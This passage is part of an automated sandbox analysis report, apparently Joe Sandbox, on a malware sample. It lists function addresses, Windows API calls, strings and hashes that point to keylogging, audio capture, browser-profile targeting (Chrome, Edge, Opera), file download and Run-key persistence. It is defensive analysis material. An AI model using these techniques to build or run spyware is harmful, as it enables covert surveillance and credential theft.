                  • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                  • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                  • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                  Strings
                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime
                  • String ID: KeepAlive | Enabled | Timeout:
                  • API String ID: 481472006-1507639952
                  • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                  • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                  • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                  • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                  Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32 ref: 00416640
                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DownloadFileSleep
                  • String ID: !D@
                  • API String ID: 1931167962-604454484
                  • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                  • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                  • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                  • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                  Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: alarm.wav$hYG
                  • API String ID: 1174141254-2782910960
                  • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                  • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                  • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                  • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                  Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • CloseHandle.KERNEL32(?), ref: 0040B0B4
                  • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                  • String ID: Online Keylogger Stopped
                  • API String ID: 1623830855-1496645233
                  • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                  • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                  • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                  • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                  • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$BufferHeaderPrepare
                  • String ID: XMG
                  • API String ID: 2315374483-813777761
                  • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                  • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                  Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocaleValid
                  • String ID: IsValidLocaleName$JD
                  • API String ID: 1901932003-2234456777
                  • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                  • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                  • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                  • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                  Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                  • API String ID: 1174141254-4188645398
                  • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                  • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                  • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                  • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                  Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                  • API String ID: 1174141254-2800177040
                  • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                  • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                  • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                  • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                  Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: AppData$\Opera Software\Opera Stable\
                  • API String ID: 1174141254-1629609700
                  • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                  • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                  • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                  • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                  Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyState.USER32(00000011), ref: 0040B64B
                    • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                    • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                    • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                    • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                    • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                  • String ID: [AltL]$[AltR]
                  • API String ID: 2738857842-2658077756
                  • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                  • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                  • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                  • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                  Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                  • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: uD
                  • API String ID: 0-2547262877
                  • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                  • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                  • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                  • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                  Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$FileSystem
                  • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                  • API String ID: 2086374402-949981407
                  • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                  • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                  • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                  • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                  Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: !D@$open
                  • API String ID: 587946157-1586967515
                  • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                  • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                  • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                  • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                  Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___initconout.LIBCMT ref: 0045555B
                    • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B30
                  • WriteConsoleW.KERNEL32 ref: 0045557E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ConsoleCreateFileWrite___initconout
                  • String ID: PkGNG
                  • API String ID: 3087715906-263838557
                  • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                  • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                  • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                  • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                  Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyState.USER32(00000012), ref: 0040B6A5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: State
                  • String ID: [CtrlL]$[CtrlR]
                  • API String ID: 1649606143-2446555240
                  • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                  • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                  • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                  • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                  Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • __Init_thread_footer.LIBCMT ref: 00410F29
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Init_thread_footer__onexit
                  • String ID: ,kG$0kG
                  • API String ID: 1881088180-2015055088
                  • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                  • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                  • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                  • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                  Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteOpenValue
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                  • API String ID: 2654517830-1051519024
                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                  • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                  • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                  Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                  • GetLastError.KERNEL32 ref: 00440D35
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorLast
                  • String ID:
                  • API String ID: 1717984340-0
                  • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                  • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                  • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                  • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                  Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                  Download Yara Rule
                  APIs
                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                  • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                  • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                  • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastRead
                  • String ID:
                  • API String ID: 4100373531-0
                  • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                  • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                  • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                  • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99